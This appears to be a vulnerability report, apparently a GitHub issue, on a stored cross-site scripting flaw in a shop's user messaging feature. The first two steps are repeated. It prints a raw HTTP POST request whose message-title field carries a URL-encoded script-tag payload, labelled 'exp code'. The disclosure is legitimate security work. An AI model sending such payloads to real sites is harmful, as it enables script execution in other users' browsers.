1、The first user inserts a malicious script into the header field of the outbox and sends it to other users.
2、When other users open the email, the malicious code will be executed.
3、exp code:
POST /user/?load=message&act=add_message HTTP/1.1
Host: hucart.91dtip.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0
1、The first user inserts a malicious script into the header field of the outbox and sends it to other users.


2、When other users open the email, the malicious code will be executed.
3、exp code:
POST /user/?load=message&act=add_message HTTP/1.1
Host: hucart.91dtip.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://hucart.91dtip.com/user/?load=message&act=send_info
Content-Type: application/x-www-form-urlencoded
Content-Length: 157
Connection: close
Cookie: PHPSESSID=v97hmcd0r156989so2rjksqj55; ck_num=fcac695db02687ffb7955b66a43fe6e6; bdshare_firstime=1556003682005
Upgrade-Insecure-Requests: 1
use_name=test2&mes_title=%22%3E%3Cscript%3Ealert%281234%29%3C%2Fscript%3E%2F%2F&mes_content=%3Cp%3E%0D%0A%09test%3C%2Fp%3E%0D%0A&submit=+%E6%B7%BB+%E5%8A%A0+
The text was updated successfully, but these errors were encountered: